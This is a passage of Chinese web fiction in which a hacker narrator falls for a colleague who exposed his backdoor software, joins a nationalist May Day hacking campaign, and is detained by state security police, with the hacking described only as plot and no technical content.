  说是这么说,我呆了几秒钟也笑了。周围的客人看着我们忽然毫无征兆的大笑起来,都莫名其妙。   从那一刻起我对小茜有一种特别的感觉了。
  我对小茜详细的说明了事件的经过。我没有告诉她我在黑客世界里的显赫身份,我只是说,我通过那个后门监控软件查到了有人侵入服务器,于是我回去后继续追踪,就要查到对方的I P时忽然发生了系统崩溃的事。
  小茜很用心的听着,她的睫毛一颤一颤让我时不时想入非非。我对自己很失望,也许真是很久没有接触女人了,对女人的品位越来越低了?   小茜不会想到我在想什么,要知道的话她说不定会把眼前的热茶泼到我脸上。我只是推测,后来证明我的推测比较正确。因为若干日子后我和她正在亲热时,一不小心说出了现在的想法,小茜很不客气的一脚把我从床上揣了下去。
  你认为是刘民吗?小茜说。   很有可能。   我们需要合作,找出那个窃取资料的人。   我注意她并没有说刘民的名字。   我想不出有什么必要和一个女孩合作,但我也想不出在这种情况如何才能拒绝她的合作请求。我只能说,没问题,还请你多指点。   看起来小茜很受用这句话。从一个女孩的表情可以看出她的喜怒哀乐的话,说明这是个纯洁的女孩,当然也能说肤浅。我相信是纯洁。   小茜的宿舍很近,我建议去她那里。我不想带她到我的狗窝,我在公司的形象一直是整洁斯文。何况,我的机子里有很多的儿童不宜的东西,我相信小茜看到之后会脸红的。也许,还因为我的桌面是前任女友的照片。从她离开后,我保留一切东西,什么都没改变。这是否意味着我想挽回过去和逃避现实?
  小茜犹豫了一会儿同意了我的建议,我把这犹豫理解为女孩的矜持。到了小茜的宿舍后我知道错了。   这纯粹是另一个狗窝,我目瞪口呆的看着小茜收拾着四处散乱的东西,花花绿绿的女性用品让我大开眼界。   看什么看!!小茜没好气的说。   我说没看,谁想看这,又不是没看过。   我看你的眼睛瞪得比牛还大!   我懒得和她吵,和一个正在气极败坏的女人吵是最愚蠢的事情。好在小茜很快就将一堆的内衣扔到衣柜里去了,并且打开了计算机。   你相信那个窃贼今天还会来吗?   我觉得他会来。   为什么?   不为什么,直觉。   又是直觉,女人的直觉啊!我无话可说。   事实证明女人的直觉不一定正确。我和小茜守侯了几个小时仍没有等到窃贼的出现。我和小茜都使用了窃贼这个词,含着对黑客世界的败类的蔑称。   我强打着精神。我可是昨晚整夜未眠。到了十一点,我说要回去了。为了一个女人可笑的直觉,我可不想奉陪。   看得出,小茜是准备耗上了,从她送我出门时那兴致高昂的表情就能看出来。我想起了肥猫,如果他在的话,应该是个很好的帮手。   走啦,还想什么?小茜不耐烦的说。她巴不得赶快回到机子前吧。   我说,没想什么。   我转身离开。   走下了楼,我抬头看了看小茜的窗户。寂静的黑夜中,一点昏黄的灯光透出,一个模糊的影子晃动着。我呆立了片刻,终于走了。
  回到宿舍后我照例打开机子,收到了肥猫的留言。他告诉我美国黑客组织PoisonBOx的行动升级了,已经开始大肆攻击中国网站,并由政府网站扩散到民间网站。他知道我在一家大公司上班,因此警告我要小心防范。他当然不知道我的公司已经被攻击了。我们一直严格遵守着黑客第三准则。他除了知道我是在一家大公司上班外其他一无所知,甚至连我在深圳都不知道。而我,除了想象他是一个肥佬或者养着一只懒散的肥猫外,也是一无所知。这也许构成了我们能长久交往下去的前提。
  肥猫最后还说,由于美国黑客的行动升级,中国的黑客组织决定组织大规模反击。一个由中国红客联盟,中华黑客联盟和中国飞鹰组织为发起人的临时指挥部已经成立。作为逍遥派的杰出代表之一,肥猫被邀请为其中的一员。
  我们将在最近举行一次协调大会,部署五一大反攻的计划,肥猫说。   我知道肥猫想叫我参加,否则他不会告诉我这么多机密。我不知道怎么办。我痛恨自以为是指手画脚的美国,但我实在太累了。   网络与现实之门开开合合,有时我分不清我到底是在虚拟世界,还是现实世界。也许唯一真实的,是我桌面的那张照片,还有很久很久以前留下的晶莹的眼泪。   从那时起,我告诉自己,要远离网络。   我在思索中睡着了。我做了一个梦,,梦里有一个女人在晃动,有点熟悉,但看不清脸。背景是无数色彩绚丽的数字,迎面飞驶而来,让我有一种晕旋的感觉。 $$$我陶醉在这种晕旋的感觉里,就象喝了一杯沉酿的酒。 $$$$$$$$$$$$$$$$$$$
  我精神抖擞的走进办公室。一进门就看到小茜无精打采的趴在桌上。我知道这个直觉的女孩白辛苦了一晚上。我上前问候了一句,小茜恨恨的说,我就不信他不出现,今天晚上我们再等着。
  我注意到她很自然地用了一个词:我们。我张嘴想说,我可没同意和一起。但我张了张嘴,终于没有反对。   这是个好机会。有一个女人总比没有强,说不定,晚上还能发生一点故事。   我不是小人,但也不是君子。我就是抱着这种龌龊的思想再次来到小茜的房间。   明亮,整洁,温馨。   我傻傻的看着这个和昨天截然不同的房间,半天没想明白。看来女人是善于创造奇迹的。   小茜红着脸说,你坐,你坐。   我浑身不舒服。我宁愿是在昨天那狗窝里,没有什么男女的区别,那样我会更自然一点。在这个突然女性化的地方,我无所适从。   我紧张的坐在计算机旁,我闻到了小茜的香水味。在我印象中小茜从来没有撒过香水。   看来今天又是一个不寻常的夜晚。   小茜表情很奇特的看着我。我专心致志地看着屏幕,目不转睛。   我想和你说件事,小茜说。   我的心一阵急跳。在这种情况下,一个女孩用一种很犹豫很羞涩的口气对我说,我想和你说件事!!!   我装做很平静地说,什么事?   其实,昨天你走后,我并没有监控那个网络窃贼,我花了几个小时把屋子里彻底打扫了一遍。   我哦了一声,没有说话。在这种情况下,不做任何反应是最正确的选择。但我没想到,小茜要说的话如此令我吃惊。   因为我知道,我是抓不到那个网络窃贼的。   我又哦了一声,我还没反应过来。   因为,我就是那个下载文件的人。   也许是太吃惊了,我的脑袋一片空白。   小茜很同情的望着我,就象看一条快死的鱼。   从外地下载保密资料的文件,实际上就是一个局。由主任布置下来的。   为什么?我发现我的喉咙有点发干。   因为我很早就发现了你装的那个监控软件,但我不知道是谁装的,于是我向主任做了汇报。主任和我商量了一下,认为这事关重大,决定设一个局,把这个人引出来。   我有气无力的说,那你为什么告诉我?这不正好,人赃并获。还等啥,通知公安局啊,安全局也行。要不要现在就把我绑起来?   我为什么要通知公安局?小茜吃惊地睁大眼睛。一开始我以为有商业间谍呢,所以才向主任汇报的。现在真相大白了,你只不过是为了公司的利益而已,我还应该感谢你呢,让我省了好多事。
  我傻乎乎的听着。这几天我经历的事情太多了,老是出乎我的意料,这让我的思维有点迟钝。我这个可笑可怜可悲的天王啊,被人玩弄于股掌之间都不自知。我决定,以后谁再叫我天王我和谁急!
  我反应过来后,忽然想到一件事。我说,你昨天就知道是我做的了,为什么不告诉我?   我说这话的时候带着明显的气愤的语气。我在想,这他妈的不是玩我吗?   小茜的脸色阴晴不定,也不知道在想什么。我想她是不是在找什么借口?不管你找什么理由我也决定摔门就走了。   你以为,我昨天花了几个小时收拾房间,是为了什么?   为,为了什么?我忽然之间又不会说话了。   小茜直瞪瞪的看着我,不说话。   我也不说话。房间的气氛很微妙。似乎在发生一种奇妙的变化&&由原来的尴尬僵持,变得暧昧起来。   这是很要人命的变化。我决定不走了。看谁先出声!这么做确实有点有失君子风度,但管不了那么多了。   你可以走了。小茜忽然说,我看到她的眼眶有点红。   我楞了片刻。站了起来。靠,走就走,谁怕谁啊。   在我站起来的一瞬间,小茜转过身去了。我没理她,走到了门口。把手放到门扭上。我觉得那门扭似乎有千斤重。我的手有点颤抖,我知道门开后,将会是一个世界,一个我所熟悉的旧世界。我在那个世界里寂寞孤独的行走了一年多。
  我该走出去吗?   我决定回头和小茜说声再见。我要保持风度。   回过头,发现小茜趴在桌上,肩头在颤动。我张了张嘴,发现说不出一句话来。   小茜,一个普通,好强,不美丽的女孩,这和我的理想差太远了。她的皮肤不光滑,她的个子不高挑,她的声音不甜美。   可我为什么还站在这里?   一年前,我曾经放弃过那一滴晶莹的眼泪。我把它做为我过去岁月的墓志铭。我时刻在想,如果那一刻我追出去了,那我的现在将是另一个样子。   但我没有,所以我只能在这里犹豫着。我不知道爱情是什么,也许,爱情就是感动和心乱如麻?   我走了回去,把手放在小茜的肩上。不管怎么说,我已经错过了一次,我不想再次错过。   小茜的肩头逐渐停止了颤动。我们就这样一动不动。时间在这一刻似乎凝固。我知道我要做什么了。   在这一段时间里,我不再对世界冷淡了,我久违的充实感又回到了心中。一种温暖的感觉将我包围,逐渐点点滴滴渗透我的全身,每一个细胞。   我从背后将小茜抱住。我感觉小茜的身体忽然僵硬了,然后点点滴滴融化,最后,她全身乏力的躺倒在我怀里。   我们这么坐着。很久。
  回到宿舍,我打开机子。我发现肥猫并没有打开ICQ.我破天荒的按下写消息按纽,弹出一个小窗口。我敲打着键盘,写了三个字&&我参加!!   让该死的美帝国主义尝尝无产阶级铁拳的厉害!!!!
  肥猫很快上了线。他告诉我说,正在和几个负责人开会,协调五一反击的事情。我的消息转到了他的手机上,所以他临时出来了。在他的带领下,我也进入了一个网站的秘密聊天室。这里云集着中国黑客界的精英。我发现了很多大名鼎鼎的人物,当然我也是其中之一。当我进聊天室时,受到了热烈的掌声欢迎。
  由于美国政府已经觉察到了五一的这次行动,因此他们决定提前防范,在五一那天将白宫、五角大楼、中央情报局、美国联邦调查局、美国航空航天局、美国国会、《纽约时报》、等重要的网站安全保密级别提高,由允许普通用户访问改为只容许权限用户访问,因此,临时指挥部决定提前一天发动进攻,也就是三天后的四月三十号,开始第六次网络卫国战争。之所以称为第六次,是有前几次的台湾民进党上台后进攻台湾网站,日本攻击站,南斯拉夫中国使馆被炸引发的攻击战等等。
  临时指挥部决定分为几个小组进行攻击。三大黑客组织的负责人,肥猫,我,以及其他几个天王级人物,分别为小组负责人,下设高手级和新手级。由高手级带领新手级进攻一般性的网站,由天王级负责对重要网站的进攻,并负责协调组员。攻击方式将主要采用拒绝服务式登陆方式,也称潮水登陆,也就是说,在同一个时间,向同一个I P地址发送大量的数据,将导致网络的严重阻塞!
  毫无疑问,这是最大的一次黑客反击战!   我从没有感受如此的激动。也许,当一个人融入到一个伟大民族中时,能为这个民族做出一点哪怕是微薄的贡献时,也是自豪的!!   我期待着。   我根本没有预想到一场危险正在靠近,它足以把我摧毁。
  期待是一种美丽,也是一种痛苦。我在心神恍惚中度过了一天,幸好主任看起来也有点心神不宁,可能还没从昨天的打击中恢复过来。所以我用来打发时间的最好办法就是看小茜。我颇有兴趣的观察着这个我以前没有注意过的女孩。小茜很严肃的在办公室进进出出,我看得出来她时不时会脸红一下。也许是我的错觉。我在考虑要不要把小茜吸收进五一的战役中来。
  在我为公司工作的三年里,我第一次觉得,公司除了工资和奖金外,还有值得我关注的东西。   但我没有机会和小茜说这些。下班后我走出办公室,下楼,我想在路口等她。我不想在公司张扬。   有几个陌生人坐在一楼的会客厅里。套用古龙的话来说,这几个人无论坐在那里,都是最不起眼的。他们就和你在街上遇到的成千上万人一样普通,可是,千万人中只要有他们在,你就会立刻注意到他们。
  我从来没有什么直觉,也不相信什么直觉,我对古大侠的话不屑一顾。可在大厅的来来往往的人中,我一眼就看到了坐在大厅一角的沙发上的这几个人。这几个人让我觉得有一种危险的感觉&&就象老鼠闻到了猫的气味。
  在看到我的同时,他们站了起来。很沉稳的朝我走了过来。我有紧张,我不知道发生了什么。   你好,天王。其中一个领头的中年人对我说。   我吃了一惊。在几秒的时间里,我一片空白。   也许看出了我的惊讶,中年人笑了笑,说,先自我介绍,我叫杨成,市安全局网络安全科的。   如果一个黑客遇到网络警察,最好的办法就是闭上嘴。没有充分的证据他们根本就不可能来找你。   别紧张,我们只是想找你谈谈。请和我来好吗?   杨成说话很客气,却带着不容拒绝的表情。我注意到旁边已经有同事看着我们。我只有和他们走出门。门口停着一辆小轿车,是警车牌照。   在我坐进车的那一刻,我看到小茜从门口出来,她也看到了我。可惜我没有时间和她说话,就被推上了车。   在车开的瞬间,我看到小茜在后面追跑了几步,然后车帘被拉上了,我陷入了阴暗之中。
  在一间小会客室里,我和杨成面对面坐着。杨成没有说话,我也没有说话。我看过不少推理小说,我知道警察一般都会在审问之前沉默很久,让罪犯先胡思乱想,然后自己崩溃。
  但我不会。我相信自己并没有做什么坏事。就算是入侵过计算机的系统,我也没做什么破坏。我一直遵守着黑客第一准则。   在我意料之中,杨成先开口了。   我们请你来,是想和你谈一谈。这不是审问,只是私下的交谈,如果你想走的话,我可以马上安排车。   我在心里笑了一下。把我当傻瓜了?不过我听到这话,心里也稍微安定了一点。   我知道你们正在策划一个五一攻击战。我想了解一下具体情况。   我不吭声。政府知道这件事我并不感到意外,网络本就没有任何秘密。我只是奇怪,他们怎么会找到我的。要知道,和肥猫这一类人比起来,我入侵系统的次数并不太多。   奸细?我脑袋中忽然冒出了一个词。我出了一身冷汗。   你们是怎么找到我的?   杨成笑了笑,说,在党的领导下,在广大人民群众的积极配合下,不要说找个人,就算是找只蚂蚁也没问题。   我暗暗的骂了一句,老狐狸!   也许是怜悯,杨成叹了口气,说,你们这些小毛孩啊,不知天高地厚,以为学到一点网络知识,下载几个木马或密码字典之类的黑客工具就以为自己是黑客了。我们是干嘛吃的?我们每天就坐在计算机面前分析黑客工具,追踪病毒行踪。我们科里哪个人拿出去不算一个天王?不要说你,稍微有点名气的黑客,什么肥猫啊,飞鹰啊,不都在我们的控制之下?
  你们每天上几次厕所我都一清二楚。杨成最后下结论似的说。   我目瞪口呆地听着。   我伟大的祖国啊

我要回帖

更多关于 蓝牙音箱方案有哪些 的文章

 

随机推荐